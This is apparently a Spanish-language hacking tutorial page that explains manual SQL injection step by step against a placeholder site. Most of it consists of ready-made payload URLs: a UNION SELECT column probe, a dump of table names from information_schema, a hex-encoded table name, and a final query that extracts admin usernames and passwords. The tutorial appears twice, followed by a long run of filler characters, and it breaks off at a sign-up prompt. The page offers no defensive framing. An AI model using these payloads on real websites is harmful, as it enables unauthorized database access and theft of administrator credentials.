Hackear
http://www.tupagina.com/contenido.php?id=6' para saber si es vulnerable
http://www.tupagina.com/contenido.php?id=-6+union+select+1,2,3,4,5,6,7--
y nos muestra 2 y 3 es la tablas
usaremos el 2 y ponemos esto = replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29
y al final de la url ponemos esto = +from+information_schema.tables--
2 paso =nos vamos a esta pag= http://www.swingnote.com/tools/texttohex.php
y en string borramos y ponemos la table que queremos convertir y nos dara el Hexadecimal ^^
en mi caso fue 61646d696e5f7573657273
3 paso = borramos el código que aviamos puesto antes este replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 y lo remplasamos por column_name
y al final le ponemos este codigo =columns+where(table_name=0xaqui el codigo)limit+1,1--
luego donde dic aquí el codigo que convertimos lo ponemos y en tables borramos y ponemos el codigo
fin del codigo http://www.tupagina.com/contenido.php?id=-6+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e5f7573657273)limit+1,1--
despues ponemos enlos numeros de están +1,1-- de 1 a 2 y 3 esto es para que vaya revelando las columnas
4 paso == revelar culumnas borramos column_name y ponemos esto = group_concat(admin_username,0x3a,admin_password)
son las columnas q keremos revelar y al final borrar de información todo y ponemos terminar con el nombre de la tabla ;)
+admin_users
codigo finalhttp://www.tupagina.com/contenido.php?id=-6+union+select+1,group_concat(admin_username,0x3a,admin_password),3,4,5,6,7+from+admin_users--
####################################################################################
Facebook: https://www.facebook.com/Fakundo.Rybka
Twitter: https://twitter.com/juandiego_rc
E-mail: juandikpoalz4@hotmail.com
####################################################################################
Para Inyeccion SQL No Manual Aga Click Aqui
ajajajajajaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaajajajajajaj
Como Hacer Una Inyeccion SQL Manual
http://www.tupagina.com/contenido.php?id=6' para saber si es vulnerablehttp://www.tupagina.com/contenido.php?id=-6+union+select+1,2,3,4,5,6,7--
y nos muestra 2 y 3 es la tablas
usaremos el 2 y ponemos esto = replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29
y al final de la url ponemos esto = +from+information_schema.tables--
2 paso = nos vamos a esta pag= http://www.swingnote.com/tools/texttohex.php
y en string borramos y ponemos la table que queremosconvertir y nos dara el Hexadecimal ^^
en mi caso fue 61646d696e5f7573657273
3 paso = borramos el código que aviamos puesto antes este replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 y lo remplasamos por column_name
y al final le ponemos este codigo = columns+where(table_name=0xaqui el codigo)limit+1,1--
luego donde dic aquí el codigo que convertimos lo ponemos y en tablesborramos y ponemos el codigo
fin del codigo http://www.tupagina.com/contenido.php?id=-6+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e5f7573657273)limit+1,1--
despues ponemos en los numeros de están +1,1-- de 1 a 2 y 3 esto es para que vaya revelando las columnas
4 paso == revelar culumnas...
Regístrate para leer el documento completo.